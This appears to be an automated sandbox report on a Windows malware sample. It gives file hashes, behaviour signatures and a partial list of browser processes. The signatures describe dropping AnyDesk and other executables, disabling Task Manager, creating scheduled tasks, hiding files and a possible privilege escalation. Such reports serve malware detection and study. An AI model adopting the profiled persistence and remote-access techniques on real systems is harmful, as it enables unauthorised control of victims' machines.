C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | e84fe7ad8d62c40d9a95f6cc39cdf2e2 |
| SHA1 | 9cf3a0c8c018931e2eb2259e5002be547d7ebab8 |
| SHA256 | f66250b17ecfcc9e1f780c83e0ce8ba7f7317102cc20c26ecef784cccf3132b8 |
| SHA512 | f93cf603f037bb2723da03c675284132a7bc89ba67a3ddc39d76fef1ba66bc9fe2cd37cac9efa7605e22477cf8f629bbfe14ae94f8792a04a94c9a08aa7d9d97 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC
| MD5 | e4a68ac854ac5242460afd72481b2a44 |
| SHA1 | df3c24f9bfd666761b268073fe06d1cc8d4f82a4 |
| SHA256 | cb3ccbb76031e5e0138f8dd39a23f9de47ffc35e43c1144cea27d46a5ab1cb5f |
| SHA512 | 5622207e1ba285f172756f6019af92ac808ed63286e24dfecc1e79873fb5d140f1ceb7133f2476e89a5f75f711f9813a9fbb8fd5287f64adfdcc53b864f9bdc5 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC
| MD5 | b9251a38552da5676285b7402b167fca |
| SHA1 | 591680e4b77e65260beb9e328cc750bb9d6e95cb |
| SHA256 | c12a5379873b42057f5c0e51d4c1a0d18819dbabf4a4b9e9358ffbd166443c74 |
| SHA512 | c1f84fc616622dd02473388b77f9a15307a4405952c51ed5395e840eb600c0f1d8602855b37e21540ea823f0af02a3ddb7f90f80191d4661894613ffd21a303e |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 8a65370fe98992aefc049ef4686c2c52 |
| SHA1 | c817559810da49fdcf0aa8e3bf8aeb00edc09c62 |
| SHA256 | 44e36541bb611109fbb7f03991c7bd5f3e5063a20f97635b9fde4890401f7561 |
| SHA512 | 82f6ae3427512123b83eee075cab9c89577b583601e0f3423d70777c9f5c59868ee656085241ed76bfaf6e8d5fa2d4f28fa2b0b4e8f0e19015d22c4d50dafc33 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 30b8b6677bd9d497e69016d32440c94c |
| SHA1 | 997acd0262e137e95a311e7c547ec981e2045ce2 |
| SHA256 | 76fded0d3b6be87fcfd6c8579cdb60d5f4965a57d3ad691a896eb7867eb2076a |
| SHA512 | 6a9d426ee59e26277c1b7fa93dbf4e5b07c3cdf31d7876058acdfcc965322b06b911933fdeb9876c60b87dc35bd78a5b73e20ba59a406b3535141630fd475bcc |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | a9bc07f9bcc4cb4178349ea86ed0546b |
| SHA1 | 1781dab317f1c97aad1ebeac5883788a6d0f445a |
| SHA256 | 5c6825b2a8c2060228ece72c6948bc4d5400cba47ae36f4ab86142b43ad352f3 |
| SHA512 | 1875a64db3f54cb08837ebc214262acafcaec862e142549fda9ce527a1f489605d4a6303c97e3c564ab1dda298da6cc80ea26ec2dc5598d319d21ce4b5cd2786 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-07 19:04
Reported
2024-06-07 19:11
Platform
win10v2004-20240426-en
Max time kernel
139s
Max time network
140s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Disables Task Manager via registry modification
Downloads MZ/PE file
Possible privilege escalation attempt
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\locked.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\Goonscript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\wscript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\Goonscript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\wscript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\doorbell-upd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\locked.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\doorbell-upd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation | C:\ProgramData\stn.exe | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\Anydesk.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
Modifies file permissions
Checks installed software on the system
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_2560.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_wide_alternate.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_48.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\AnyDesk\user.conf | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_768.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_wide.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_custom_stream.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_1280.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_exif.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\AnyDesk\ad.trace | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_16.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_96.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_256.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_sr.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_16.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\AnyDesk\ad.trace | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\AnyDesk\user.conf | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_1920.db | C:\ProgramData\Anydesk.exe | N/A |
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\ProgramData\Anydesk.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\ProgramData\Anydesk.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\ProgramData\Anydesk.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949\Moniker = "cr.sb.cdmf5200eafd3ad904629cbb0f87a78a3c7211081fe" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\cr.sb.cdmf5200eafd3ad904629cbb0f87a78a3c7211081fe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3571316656-3665257725-2415531812-1000\{76172F75-B16B-4370-BCC9-297E6D3A996C} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949\DisplayName = "Chrome Sandbox" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\DefaultIcon\ = "AnyDesk.exe,0" | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949\Children | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\DefaultIcon | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\DefaultIcon\ = "\"C:\\ProgramData\\AnyDesk.exe\",0" | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open\command\ = "\"C:\\ProgramData\\AnyDesk.exe\" --play \"%1\"" | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell\open | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell\open\command | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings | C:\Windows\system32\wscript.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\cr.sb.cdmf5200eafd3ad904629cbb0f87a78a3c7211081fe\Children | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open\command | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\ = "URL:AnyDesk Protocol" | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\DefaultIcon | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell\open\command\ = "\"C:\\ProgramData\\AnyDesk.exe\" \"%1\"" | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings | C:\Windows\system32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\URL Protocol | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 493133.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\Goonscript.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\Goonscript.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\2aazV5.html
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb31e746f8,0x7ffb31e74708,0x7ffb31e74718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2060,8679241964357093862,4091776313331041541,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2340 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2060,8679241964357093862,4091776313331041541,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2392 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2060,8679241964357093862,4091776313331041541,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2760 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,8679241964357093862,4091776313331041541,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,8679241964357093862,4091776313331041541,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2060,8679241964357093862,4091776313331041541,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4832 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2060,8679241964357093862,4091776313331041541,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=4056 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=media.mojom.MediaFoundationService --field-trial-handle=2060,8679241964357093862,4091776313331041541,131072 --lang=en-US --service-sandbox-type=mf_cdm --mojo-platform-channel-handle=4940 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,8679241964357093862,4091776313331041541,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5152 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2060,8679241964357093862,4091776313331041541,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5608 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2060,8679241964357093862,4091776313331041541,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5592 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2060,8679241964357093862,4091776313331041541,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6184 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2060,8679241964357093862,4091776313331041541,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6184 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,8679241964357093862,4091776313331041541,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5948 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,8679241964357093862,4091776313331041541,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5860 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,8679241964357093862,4091776313331041541,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5604 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,8679241964357093862,4091776313331041541,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5616 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,8679241964357093862,4091776313331041541,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5608 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,8679241964357093862,4091776313331041541,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6256 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,8679241964357093862,4091776313331041541,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3608 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,8679241964357093862,4091776313331041541,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1960 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
